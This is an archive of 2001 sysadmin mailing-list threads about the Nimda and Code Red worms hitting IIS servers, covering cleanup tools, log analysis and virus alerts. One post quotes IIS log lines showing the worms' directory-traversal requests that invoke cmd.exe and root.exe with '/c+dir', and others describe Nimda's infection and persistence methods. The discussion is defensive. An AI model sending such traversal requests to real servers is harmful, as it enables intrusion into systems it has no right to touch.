  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: IIS Slow Down Due to Nimda?

[John Cesta - Lists]

Title: IIS Slow Down Due to Nimda?





  
  On my boxes where I have host headers configured and no website is 
  "default", that is, every website demands that a host header be in the 
  request, none of these requests are making it into the logs. I have no idea 
  what that means wrt IIS, maybe it is still processing them and not logging or 
  maybe it just ignores them once a matching host header isn't found.
  
  You can bet, it is still banging on you 
  though.
  
  John 
  Cesta
  
  jbh
  
-Original Message-From: John Cesta - Lists 
[mailto:[EMAIL PROTECTED]]Sent: Thursday, September 20, 2001 9:03 
AMTo: NT System Admin IssuesSubject: RE: IIS Slow Down 
Due to Nimda?

Any one seen there IIS Server slow down due to the 
bug? Is there anyway to stop the request(cmd.exe) 
from even being made to you box? 
Here's is what my logs look like. Sunday was a little slow 
but on an average day we get around ~700 unique visitors. 


Of 
course IIS is going to slow down due to many requests. Not much of a way to 
make it stop unless you know where the source is, call them and ask. 
Otherwise we are all in the same boat.

John Cesta

  -Original Message-From: Jerry Gamblin 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 
  20, 2001 10:36 AMTo: NT System Admin IssuesSubject: 
  IIS Slow Down Due to Nimda?
  Any one seen there IIS Server slow down due to the 
  bug? Is there anyway to stop the request(cmd.exe) 
  from even being made to you box? 
  Here's is what my logs look like. Sunday was a little slow 
  but on an average day we get around ~700 unique visitors. 
  Date 
  Hits Successful Hits 09/16/2001 
  : 372 : 222 09/17/2001 : 3,454 : 
  1,026 09/18/2001 : 6,224 : 1,046 
  09/19/2001 : 5,401 : 745 09/20/2001 : 2,193 : 86 
  Total Hits : 17644 Average Hits : 
  3528 
  That's around 14,000 hits alone from this virus. 
  I don't know what its doing to the server, but is there 
  any way to make it stop? 
  Jerry Gamblin Technology 
  Specialist 
  Linn State Technical College One 
  Technology Drive Linn, MO 65051 
  [EMAIL PROTECTED] www.linnstate.edu 573-897-5240 
  
  -Original Message- From: 
  Murray Freeman [mailto:[EMAIL PROTECTED]] 
  Sent: Thursday, September 20, 2001 9:24 AM 
  To: NT System Admin Issues Subject: RE: HELP VIRUS ON NT MACHINE? 
  HEY, not true, not true. We got hit on 3 servers and were 
  able to cleanse manually and never even turned off 
  the servers, nor did it impact our regular 
  production. 
  Murray 
  -Original Message- From: 
  Rocky Stefano [mailto:[EMAIL PROTECTED]] 
  Sent: Thursday, September 20, 2001 9:21 AM 
  To: NT System Admin Issues Subject: RE: HELP VIRUS ON NT MACHINE? 
  For those of you that were unfortunately hit with the 
  latest worm. There is usually no recourse but to 
  wipe the machine clean and reload your software. Trend Antivirus has released a cleaner for the virus. Here is the 
  info. 
  Trend Micro has developed a cleaning tool that will allow 
  you to clean systems infected by PE_NIMDA.A. The 
  cleaning tool and instructions, manual cleaning 
  instructions, and the latest pattern file can be found on our FTP 
  site at: 
  ftp://us-web\[EMAIL PROTECTED] 
  
  Password: tmcustomer 
  Directory: Premium Customer\tool 
  Files: 
  Cleaning tool: FIX_NIMDA.zip 
  Cleaning tool description and instructions: 
  Readme_nimda.txt 
  Manual cleaning documentation: How to Clean.txt 

  Latest pattern file: ptn_942.zip 
  -Original Message- From: 
  Tiffany Belcher [mailto:[EMAIL PROTECTED]] 
  Sent: September 19, 2001 5:35 PM To: NT System Admin Issues Subject: HELP 
  VIRUS ON NT MACHINE? 
  This thing is on a machine at work and it writes .eml 
  files all over the place in the folders on the 
  hard drive. Is there a way to get rid if this virus? What is it? Uninstalling outlook express or email would that 
  do it? It ran very sluggish and now is frozen up. 
  HELP 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: How do you all do it?

[John Cesta - Lists]

 -Original Message-
 From: Don Collier (Intermap Denver) [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, September 20, 2001 6:03 PM
 To: NT System Admin Issues
 Subject: How do you all do it?


 I just joined this list today and am overwhelmed with email.  Almost 200
 messages today.  How do you all keep up with this list and get any work
 done?  (Not meant to imply anything)

We don't...maybe you are on the wrong list...we are all independently
wealthy and just like to keep hacking.

...you work?

John


 _
 Don Collier
 Network Administrator
 Intermap Technologies Inc.
 Voice:  303-708-0955 x-207
 Fax:303-708-0952
 [EMAIL PROTECTED]
 www.intermaptechnologies.com

 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Help for the Nimda virus

[John Cesta - Lists]

If any one is interested: We are giving away FREE our SearchIt program.
SearchIt can search your logfiles, or any files, for text strings you
define. You can search for cmd.exe or tftp or any other piece of a virus or
IIS exploit. SearchIt may be run via a scheduler and a report of the found
files is emailed to you.

The FREE Download is at: http://www.cserverautomationtools.com

John Cesta


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Help for the Nimda virus

[John Cesta - Lists]

 -Original Message-
 From: Givens, Mike [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, September 19, 2001 10:51 AM
 To: NT System Admin Issues
 Subject: RE: Help for the Nimda virus


 define free the link provided only goes to a trail version located in
 the downloads area ?

There is a link right on the opening page right next to the dancing tools.

John

 -Original Message-
 From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, September 19, 2001 9:50 AM
 To: NT System Admin Issues
 Subject: Help for the Nimda virus




 Previous email contained an incorrectly formatted URL. Try this one.

 If any one is interested: We are giving away FREE our SearchIt program.
 SearchIt can search your logfiles, or any files, for text strings you
 define. You can search for cmd.exe or tftp or any other piece of
 a virus or
 IIS exploit. SearchIt may be run via a scheduler and a report of the found
 files is emailed to you.

 The FREE Download is at: http://www.serverautomationtools.com

 John Cesta


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Help for the Nimda virus

[John Cesta - Lists]

 -Original Message-
 From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, September 19, 2001 10:54 AM
 To: NT System Admin Issues
 Subject: RE: Help for the Nimda virus


 It also doesn't work.  I downloaded and installed it, and it didn't even
 create an executable.

That's not true actually.

1. It is FREE a production copy. The link is right on the home page to the
right of the dancing tools.
2. The search.exe file is in the c:\winnt\system32 directory.

I didn't think it would be difficult to give something away. :0

John



 -Original Message-
 From: Givens, Mike [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, September 19, 2001 10:51 AM
 To: NT System Admin Issues
 Subject: RE: Help for the Nimda virus


 define free the link provided only goes to a trail version located in
 the downloads area ?

 -Original Message-
 From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, September 19, 2001 9:50 AM
 To: NT System Admin Issues
 Subject: Help for the Nimda virus




 Previous email contained an incorrectly formatted URL. Try this one.

 If any one is interested: We are giving away FREE our SearchIt program.
 SearchIt can search your logfiles, or any files, for text strings you
 define. You can search for cmd.exe or tftp or any other piece of
 a virus or
 IIS exploit. SearchIt may be run via a scheduler and a report of the found
 files is emailed to you.

 The FREE Download is at: http://www.serverautomationtools.com

 John Cesta


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Help for the Nimda virus

[John Cesta - Lists]

 -Original Message-
 From: Jim Busick [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, September 19, 2001 12:36 PM
 To: NT System Admin Issues
 Subject: RE: Help for the Nimda virus


 I find it ironic that I had to use Explorer Search to find Searchit.

Yes, there is a glitch in the installer program we used. It works fine on
NT4.0 but on Win2k it appends the setup path to the exe's install path. It's
fairly easy to set the searchit.exe path to c:\winnt\system32\searchit.exe
and it will be fine.
We'll get that fixed as soon as we get the fix for the installer.

John Cesta

  -Original Message-
  From: Clark, Steve [mailto:[EMAIL PROTECTED]]
  Sent: Wednesday, September 19, 2001 9:29 AM
  To: NT System Admin Issues
  Subject: RE: Help for the Nimda virus
 
 
  Mod the shortcut to point to the windows dir and it works fine.
 
  Steve Clark
  Clark Systems Support, LLC
  AVIEN Charter Member
  www.clarksupport.com
  301-610-9584 voice
  240-465-0323 Efax
 
  -Original Message-
  From: Jim Busick [mailto:[EMAIL PROTECTED]]
  Sent: Wednesday, September 19, 2001 12:26 PM
  To: NT System Admin Issues
  Subject: RE: Help for the Nimda virus
 
  We appreciate the thought, but the tool does not install properly.
 
   -Original Message-
   From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
   Sent: Wednesday, September 19, 2001 8:14 AM
   To: NT System Admin Issues
   Subject: RE: Help for the Nimda virus
  
  
  
  
-Original Message-
From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:54 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus
   
   
It also doesn't work.  I downloaded and installed it, and
   it didn't even
create an executable.
  
   That's not true actually.
  
   1. It is FREE a production copy. The link is right on the
   home page to the
   right of the dancing tools.
   2. The search.exe file is in the c:\winnt\system32 directory.
  
   I didn't think it would be difficult to give something away. :0
  
   John
  
  
   
-Original Message-
From: Givens, Mike [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:51 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus
   
   
define free the link provided only goes to a trail
   version located in
the downloads area ?
   
-Original Message-
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:50 AM
To: NT System Admin Issues
Subject: Help for the Nimda virus
   
   
   
   
Previous email contained an incorrectly formatted URL.
  Try this one.
   
If any one is interested: We are giving away FREE our
   SearchIt program.
SearchIt can search your logfiles, or any files, for text
   strings you
define. You can search for cmd.exe or tftp or any other piece of
a virus or
IIS exploit. SearchIt may be run via a scheduler and a
   report of the found
files is emailed to you.
   
The FREE Download is at: http://www.serverautomationtools.com
   
John Cesta
   
   
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
   
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
   
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
   
   
  
  
   http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  
 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 

 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Help for the Nimda virus

[John Cesta - Lists]

 -Original Message-
 From: Jim Busick [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, September 19, 2001 1:03 PM
 To: NT System Admin Issues
 Subject: RE: Help for the Nimda virus
 
 
 Very usefull tool. Thanks John.

You're welcome!

John

 
  -Original Message-
  From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
  Sent: Wednesday, September 19, 2001 10:02 AM
  To: NT System Admin Issues
  Subject: RE: Help for the Nimda virus
  
  
  
  
   -Original Message-
   From: Jim Busick [mailto:[EMAIL PROTECTED]]
   Sent: Wednesday, September 19, 2001 12:36 PM
   To: NT System Admin Issues
   Subject: RE: Help for the Nimda virus
  
  
   I find it ironic that I had to use Explorer Search to find Searchit.
  
  Yes, there is a glitch in the installer program we used. It 
  works fine on
  NT4.0 but on Win2k it appends the setup path to the exe's 
  install path. It's
  fairly easy to set the searchit.exe path to 
  c:\winnt\system32\searchit.exe
  and it will be fine.
  We'll get that fixed as soon as we get the fix for the installer.
  
  John Cesta
  
-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:29 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus
   
   
Mod the shortcut to point to the windows dir and it works fine.
   
Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax
   
-Original Message-
From: Jim Busick [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:26 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus
   
We appreciate the thought, but the tool does not install properly.
   
 -Original Message-
 From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, September 19, 2001 8:14 AM
 To: NT System Admin Issues
 Subject: RE: Help for the Nimda virus




  -Original Message-
  From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
  Sent: Wednesday, September 19, 2001 10:54 AM
  To: NT System Admin Issues
  Subject: RE: Help for the Nimda virus
 
 
  It also doesn't work.  I downloaded and installed it, and
 it didn't even
  create an executable.

 That's not true actually.

 1. It is FREE a production copy. The link is right on the
 home page to the
 right of the dancing tools.
 2. The search.exe file is in the c:\winnt\system32 directory.

 I didn't think it would be difficult to give something 
  away. :0

 John


 
  -Original Message-
  From: Givens, Mike [mailto:[EMAIL PROTECTED]]
  Sent: Wednesday, September 19, 2001 10:51 AM
  To: NT System Admin Issues
  Subject: RE: Help for the Nimda virus
 
 
  define free the link provided only goes to a trail
 version located in
  the downloads area ?
 
  -Original Message-
  From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
  Sent: Wednesday, September 19, 2001 9:50 AM
  To: NT System Admin Issues
  Subject: Help for the Nimda virus
 
 
 
 
  Previous email contained an incorrectly formatted URL.
Try this one.
 
  If any one is interested: We are giving away FREE our
 SearchIt program.
  SearchIt can search your logfiles, or any files, for text
 strings you
  define. You can search for cmd.exe or tftp or any 
  other piece of
  a virus or
  IIS exploit. SearchIt may be run via a scheduler and a
 report of the found
  files is emailed to you.
 
  The FREE Download is at: http://www.serverautomationtools.com
 
  John Cesta
 
 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

   
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
   
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
   
  
   http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  
  
  
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Help for the Nimda virus

[John Cesta - Lists]

Title: RE: Help for the Nimda virus



Yo John - how come all your responses are blank. Or is just 
me.

Maybe because I am entering them under the question 
inline.

John

  -Original Message-From: [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 19, 
  2001 1:57 PMTo: NT System Admin IssuesSubject: RE: Help 
  for the Nimda virus
  Yo John - how come all your responses are blank. Or is just 
  me.
  
  
  -Original Message- From: John 
  Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 10:18 AM To: NT System Admin Issues Subject: RE: Help 
  for the Nimda virus 
   -Original Message-  
  From: Jim Busick [mailto:[EMAIL PROTECTED]] 
   Sent: Wednesday, September 19, 2001 1:03 PM 
   To: NT System Admin Issues  
  Subject: RE: Help for the Nimda virus  
Very usefull tool. 
  Thanks John. 
  You're welcome! 
  John 
 -Original 
  Message-   From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]   Sent: Wednesday, September 19, 2001 10:02 AM   To: NT System Admin Issues   
  Subject: RE: Help for the Nimda virus   
  
   
  -Original Message-From: Jim 
  Busick [mailto:[EMAIL PROTECTED]] 
 Sent: Wednesday, September 19, 2001 12:36 
  PMTo: NT System Admin Issues 
 Subject: RE: Help for the Nimda virus 

 I find it ironic that I had to use Explorer 
  Search to find Searchit. Yes, there is a glitch in the installer program we used. It 
works fine on  
   NT4.0 but on Win2k it appends the setup path to the exe's 
install path. It's   fairly easy to set the searchit.exe path to   c:\winnt\system32\searchit.exe  
   and it will be fine.   We'll get that 
  fixed as soon as we get the fix for the installer. John Cesta
  -Original Message- From: 
  Clark, Steve [mailto:[EMAIL PROTECTED]] 
  Sent: Wednesday, September 19, 2001 9:29 
  AM To: NT System Admin 
  Issues Subject: RE: Help for the 
  Nimda virus Mod the 
  shortcut to point to the windows dir and it works fine. Steve 
  Clark Clark Systems Support, 
  LLC AVIEN Charter Member 
  www.clarksupport.com  
  301-610-9584 voice 
   240-465-0323 Efax 
  -Original Message- From: 
  Jim Busick [mailto:[EMAIL PROTECTED]] 
  Sent: Wednesday, September 19, 2001 12:26 
  PM To: NT System Admin 
  Issues Subject: RE: Help for the 
  Nimda virus We appreciate the thought, but the tool does not 
  install properly.  -Original Message-  From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]  Sent: Wednesday, September 19, 2001 8:14 
  AM  To: NT System Admin 
  Issues  Subject: RE: Help for 
  the Nimda virus  
 
  
-Original 
  Message-   From: Kevin 
  Lundy [mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, September 19, 
  2001 10:54 AM   To: NT 
  System Admin Issues   
  Subject: RE: Help for the Nimda virus
   
It also doesn't work. I 
  downloaded and installed it, and 
   it didn't even   
  create an executable.  
   That's not true actually. 
 
 1. It is FREE a production copy. The link is right on 
  the  home page to the 
   right of the dancing tools. 
   2. The search.exe file is in the 
  c:\winnt\system32 directory. 
I didn't think it would 
  be difficult to give something   away. 
  :0   John
  
 -Original Message-   
  From: Givens, Mike [mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, September 19, 
  2001 10:51 AM   To: NT 
  System Admin Issues   
  Subject: RE: Help for the Nimda virus
   
define "free" the link provided 
  only goes to a "trail"  
  version located in   the 
  downloads area ?   
-Original 
  Message-----   From: John 
  Cesta - Lists [mailto:[EMAIL PROTECTED]]   Sent: Wednesday, September 19, 2001 9:50 
  AM   To: NT System Admin 
  Issues   Subject: Help for 
  the Nimda virus   
 

 Previous email 
  contained an incorrectly formatted URL.
   Try this one.  
 If any one is 
  interested: We are giving away FREE our
SearchIt program.  
   SearchIt can search your logfiles, or any files, for text 
   strings you   define. You can search for cmd.exe or 
  tftp or any   other piece of   a virus or  
   IIS exploit. SearchIt may be run via a scheduler and 
  a  report of the found 
files is emailed to you. 
 
   The FREE Download is at: http://www.serverautomationtools.com 
 
   John Cesta
   
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
 
   http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
 
   http://www.

RE: WARNING: Hacker Alert

[John Cesta - Lists]

looks like the same old code red to me.

 -Original Message-
 From: Randal, Phil [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 11:23 AM
 To: NT System Admin Issues
 Subject: RE: WARNING: Hacker Alert


 Looks like a new worm to me.  Probably planted on all those
 Code Red compromised servers :-(

 Phil

 -
 Phil Randal
 Network Engineer
 Herefordshire Council
 Hereford, UK

  -Original Message-
  From: Jason Morris [mailto:[EMAIL PROTECTED]]
  Sent: 18 September 2001 15:59
  To: NT System Admin Issues
  Subject: RE: WARNING: Hacker Alert
 
 
  CodeRed seems to have dwindled to nothing on my logs. But it's being
  replaced with the EXACT same lines you have below, and they
  stay consistent
  with the code red 2 methods of attacking the more local subnets.
 
  Jason Morris CCDA CCNP
  Network Administrator
  MJMC, Inc.
  708-225-2350
  [EMAIL PROTECTED]
 
 
  -Original Message-
  From: Jason Morris [mailto:[EMAIL PROTECTED]]
  Sent: Tuesday, September 18, 2001 9:50 AM
  To: NT System Admin Issues
  Cc: '[EMAIL PROTECTED]'
  Subject: RE: WARNING: Hacker Alert
 
 
  Yes. It seems to be systems I have previously monitored
  hitting me with
  codered attacks. I bet someone is activating all of their children.
 
  Jason Morris CCDA CCNP
  Network Administrator
  MJMC, Inc.
  708-225-2350
  [EMAIL PROTECTED]
 
 
  -Original Message-
  From: xylog [mailto:[EMAIL PROTECTED]]
  Sent: Tuesday, September 18, 2001 9:45 AM
  To: NT System Admin Issues
  Subject: WARNING: Hacker Alert
 
 
  All my public facing web servers at home and at my office have shown a
  huge continuous hacking activity. Has anyone seen similar? I fear this
  may be code red related or automated. Please comment if you have seen
  similar. Here is an excerpt from one logfile:
 
  63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01,
  x.x.x.x, 0, 145,
  0, 500, 87, GET,
  /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system
  32/cmd.exe
  , /c+dir,
  63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
  604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
  63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
  604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
  63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
  604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
  63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
  604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
  63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98,
  0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
  63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
  0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
  63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01,
  x.x.x.x, 0, 100,
  0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
  63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
  0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
  64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156,
  41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
  63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
  x.x.x.x, 0, 72,
  604, 404, 3, GET, /scripts/root.exe, /c+dir,
  63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
  x.x.x.x, 0, 70,
  604, 404, 3, GET, /MSADC/root.exe, /c+dir,
  63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
  x.x.x.x, 0, 80,
  604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
  63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15,
  80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
  63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01,
  x.x.x.x, 0, 96,
  0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
  63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
  117, 0, 500, 87, GET,
  /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
  63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
  117, 0, 500, 87, GET,
  /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
  63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
  145, 0, 500, 87, GET,
  /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system
  32/cmd.exe
  , /c+dir,
  63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15,
  97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
  64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156,
  41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
  63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16,
  97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
  63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16,
  97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
  63.101.171.231, -, 9/18/01, 

RE: Auto Reboot W2K Servers

[John Cesta - Lists]

 -Original Message-
 From: Ian Kelly [mailto:[EMAIL PROTECTED]]
 Sent: Monday, September 17, 2001 5:33 PM
 To: NT System Admin Issues
 Subject: RE: Auto Reboot W2K Servers
 
 
 Andrew,
 You wouldn't believe the number of people that have told me NT servers
 should be rebooted regularly!

It is a good idea to reboot ANY Windows machine regularly.

John Cesta
ColdFusion ASP ActiveState PERL Hosting
Includes 10 Domains - 100% Browser Based Administration
http://www.cybersmarts.net

LogFileManager - IIS LogFile Management Tool
WebPageChecker - Helps Maintain Server UpTime
http://www.serverautomationtools.com
 

 You definitely wouldn't believe how much of my day I've spent trying to
 persuade them otherwise...
 
 Ian
 ---
 
 mailto:[EMAIL PROTECTED]
 
 ---
 
 
 -Original Message-
 From: Andrew S. Baker [mailto:[EMAIL PROTECTED]] 
 Sent: September 17, 2001 17:08 PM
 To: NT System Admin Issues
 Subject: RE: Auto Reboot W2K Servers
 
 
 A - http://www.ultratech-llc.com/KB/?File=Shutdown.TXT
 
 B - Why ever would you want to reboot your servers on a scheduled basis?
 
 
 
 ==
  ASB - http://www.ultratech-llc.com/KB/?File=~MoreInfo.TXT
 ==
  Illiterate?... Write for free help.
 
 
 
 -Original Message-
 From: Guerra, Ralph [mailto:[EMAIL PROTECTED]]
 Sent: Monday, September 17, 2001 5:33 PM
 To: NT System Admin Issues
 Subject: Auto Reboot W2K Servers
 
 
 I am looking for a utility that auto reboots Windows 2000 servers. I 
 know with NT 4.0 and Terminal servers you would use the shutdown.exe
 from NT Resource Kit.
 
 I have not been able to find this utility on the Windows
 2000 Resource Kit.
 Doe anybody know what I can use for scheduled reboots of Windows 2000 
 Servers?
 
 TIA
 
 RG
 
 
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Virus Update

[John Cesta - Lists]

I am 
getting this thing on my PC. When I click on the email a dialog appears asking 
me if I wish to save this to disk or open it. It's a readme.exe 
file.

John 
Cesta

  -Original Message-From: Clark, Steve 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 
  2:16 PMTo: NT System Admin IssuesSubject: Virus 
  Update
  
  Got 
  this from Peter Kruse 
  who pointed me to http://www.norman.no/ - thanks!
  
  The worm 
  W32/Nimda.A@mm is spreading very fast. It may arrive as an email with the 
  following charteristics:Subject: NoneBody: NoneAttachment name: README.EXEThis worm 
  may enter a computer in several ways - it will either be received as an email 
  with an attachment, over open shared drives in networks, and it seems that it 
  will also attempt to break into machines running the web server software IIS 
  (Internet Information Server), utilizing various security holes well known . 
  All IIS web server admins are encouraged to patch up their web server to 
  protect themselves. An accumulative patch for IIS servers is available from: 
  http://www.microsoft.com/technet/security/bulletin/MS01-044.aspWhen 
  the infected file is run, it will copy itself to the system directory as a 
  hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so 
  that it is run from startup.
  
  It may not remove 
  everything  but it may stop it long enough to see what damage was 
  done.
  
  Steve 
  Clark
  Clark 
  Systems Support, LLC
  AVIEN 
  Charter Member
  www.clarksupport.com
   
  301-610-9584 voice
   
  240-465-0323 Efax
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: FW: Worm probes

[John Cesta - Lists]

Title: RE: FW: Worm probes





  -Original Message-From: [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 
  2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: 
  Worm probes
  From Panda (note they won't have a sig file for a few hours 
  yet): Panda Software alerts users on the appearance of 
  W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads 
  through the e-mail and is automatically executed simply by previewing the 
  message that contains it. 
  To perform the infection it exploits a vulnerability 
  discovered by the security expert Juan Carlos García Cuartango in Internet 
  Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This 
  flaw allows for the automatic and immediate execution of files. This means no 
  action, such as double-clicking the attached file, is necessary for the virus 
  to be activated. However, it requires that the 'preview' option is enabled in 
  the mail clients for the vulnerability to be exploited and README.EXE, the 
  virus filename, to be executed.
  
  I am not so sure thatthis assessment is entirely correct. 
  For example, in my situation, I have a PC with Outlook2000 and preview 
  mode enabled. What I get is that when I click on the email a dialog box opens 
  and prompts whether or not Iwish to save the file to disk - the 
  README.EXE file that is.I just click cancel and then delete the email. I do 
  not contract the virus.
  
  John 
  Due to this threat, Panda Software recommends to follow up the 
  news appearing in the specialised media. It also warns against opening the 
  mail client before the anti-virus is updated with the corresponding pav.sig, 
  which will be made available to all users by the European multinational in the 
  next few hours, together with the additional info about the 
